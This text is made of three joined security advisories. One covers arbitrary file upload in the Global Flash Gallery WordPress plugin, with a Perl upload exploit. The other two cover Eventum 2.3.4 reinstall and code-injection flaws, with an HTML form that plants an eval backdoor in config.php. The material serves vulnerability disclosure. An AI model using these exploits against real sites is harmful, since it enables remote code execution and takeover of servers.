The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
            
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  January 22, 2014  [without technical details]
Vendor Notification: January 22, 2014 
Vendor Patch: January 24, 2014 
Public Disclosure: January 27, 2014 
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical 
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in Eventum, which can be exploited to reinstall and compromise the vulnerable application.


1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to incorrect default permissions set for the installation scripts. Access to the installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the vulnerable application. 

The installation script can be accessed by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php


2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in the "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to the application's database, which can be achieved by providing the address of an attacker-controlled MySQL server. 

The following exploitation example injects a backdoor into "/config/config.php" file:


<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>


After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

-----------------------------------------------------------------------------------------------

Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

The vendor disclosed the vulnerabilities and authorized us to release the advisory publicly before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            
source: https://www.securityfocus.com/bid/65186/info

Eventum is prone to an insecure file-permission vulnerability.

An attacker can exploit this issue to reinstall the vulnerable application. This may aid in further attacks.

Eventum 2.3.4 is vulnerable; other versions may also be affected. 

The following example URI is available.

http://www.example.com/setup/index.php